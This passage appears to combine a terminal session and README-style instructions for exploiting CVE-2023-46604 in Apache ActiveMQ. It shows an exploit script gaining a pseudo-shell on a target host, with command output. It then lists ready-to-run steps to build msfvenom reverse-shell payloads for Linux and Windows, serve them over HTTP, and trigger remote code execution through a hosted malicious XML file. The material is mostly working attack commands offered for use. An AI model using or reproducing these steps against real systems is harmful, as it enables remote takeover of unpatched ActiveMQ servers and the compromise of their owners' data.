$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: <http://10.10.14.59:8080/poc.xml>
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
282297599-38f280fa-2252-4161-acb3-9b92d3635eac.webm
This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).
Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.
git clone <https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell>
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
git clone <https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell>
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml